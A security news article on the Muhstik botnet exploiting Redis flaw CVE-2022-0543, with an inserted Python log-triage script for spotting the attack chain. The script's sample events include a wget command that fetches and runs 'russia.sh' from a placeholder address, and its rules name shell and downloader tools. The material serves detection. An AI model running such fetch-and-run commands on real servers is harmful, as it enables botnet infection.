The Cyber Security News

Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability

March 28, 2022

Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.

The vulnerability relates to CVE-2022-0543, a Lua sandbox escape flaw in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.

“Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,” Ubuntu noted in an advisory released last month.

According to telemetry data gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (“russia.sh”) from a remote server, which is then used to fetch and execute the botnet binaries from another server.
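The chain described above (a Redis host retrieving "russia.sh" and then running it) can be hunted for in process-creation telemetry. The following is an added example, not code from Juniper Threat Labs or from the original article; the JSON field names, the list of suspicious child programs and the sample events (including the 203.0.113.10 documentation address) are assumptions constructed for illustration.

```python
import json
import shlex
from pathlib import PurePosixPath

# Programs a Redis server process has no routine reason to start (assumed list).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget"}
SCRIPT_INDICATOR = "russia.sh"  # script name given in the article

# Constructed process-creation events, one JSON object per line. The field
# names and the 203.0.113.10 documentation address are assumptions.
SAMPLE_EVENTS = """
{"ts": "2022-03-11T02:14:07Z", "host": "db01", "parent": "/usr/bin/redis-server", "cmdline": "sh -c 'wget -q http://203.0.113.10/russia.sh -O /tmp/russia.sh'"}
{"ts": "2022-03-11T02:14:09Z", "host": "db01", "parent": "sh", "cmdline": "/bin/bash /tmp/russia.sh"}
{"ts": "2022-03-11T02:20:00Z", "host": "db02", "parent": "systemd", "cmdline": "/usr/bin/redis-server /etc/redis/redis.conf"}
{"ts": "2022-03-11T02:21:30Z", "host": "db02", "parent": "sshd", "cmdline": "bash -l"}
{truncated line
"""


def child_binary(cmdline):
    """Return the basename of the program a command line starts."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a logged command line
        argv = cmdline.split()
    return PurePosixPath(argv[0]).name if argv else ""


def triage(log_text):
    """Return (host, ts, reasons) for every event that matches a rule."""
    findings = []
    for raw in log_text.splitlines():
        try:
            event = json.loads(raw)
            parent = PurePosixPath(event["parent"]).name
            cmdline = event["cmdline"]
        except (ValueError, KeyError, TypeError):
            continue  # skip blank, damaged or incomplete records
        reasons = []
        if parent == "redis-server" and child_binary(cmdline) in SUSPICIOUS_CHILDREN:
            reasons.append("redis-server started a shell or downloader")
        if SCRIPT_INDICATOR in cmdline:
            reasons.append("command line names russia.sh")
        if reasons:
            findings.append((event.get("host"), event.get("ts"), reasons))
    return findings
```

The parent-process rule is the more durable of the two, since a file name such as "russia.sh" is trivially changed while a database server starting a shell or downloader stays anomalous.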

First documented by Chinese security firm Netlab 360, Muhstik is known to be active since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.

Capable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and Tomato routers, Muhstik has been observed weaponizing a number of flaws over the years:

  • CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
  • CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability
  • CVE-2019-2725 (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability
  • CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and
  • CVE-2021-44228 (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell)

“This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,” Juniper Threat Labs researchers said in a report published last week.

In light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.


Some sections of this report are sourced from:
thehackernews.com
